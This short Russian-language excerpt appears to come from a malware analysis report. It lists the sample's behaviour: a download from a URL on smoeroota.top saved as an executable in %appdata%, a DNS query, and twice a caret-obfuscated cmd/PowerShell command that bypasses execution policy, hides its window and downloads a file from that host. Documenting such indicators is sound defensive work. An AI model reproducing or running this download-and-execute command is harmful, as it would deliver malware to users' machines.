Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^ersh^ELL.^exe -e^X^EcU^ti^O^NPol^ICY B^Yp^Ass^ -^N^OP^r^ofI^lE ^-^wIndow^St^YlE ^Hi^d^dEn ^(NeW-ob^je^CT SyS^TE^M^.^N^eT^.we^bc^LIEN^t^)^.^DO^wn^l^oaDfIl^E(^'http://smoeroota.t...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "Pow^ersh^ELL.^exe -e^X^EcU^ti^O^NPol^ICY B^Yp^Ass^ -^N^OP^r^ofI^lE ^-^wIndow^St^YlE ^Hi^d^dEn ^(NeW-ob^je^CT SyS^TE^M^.^N^eT^.we^bc^LIEN^t^)^.^DO^wn^l^oaDfIl^E(^'http://smoeroota.t...' (со скрытым окном)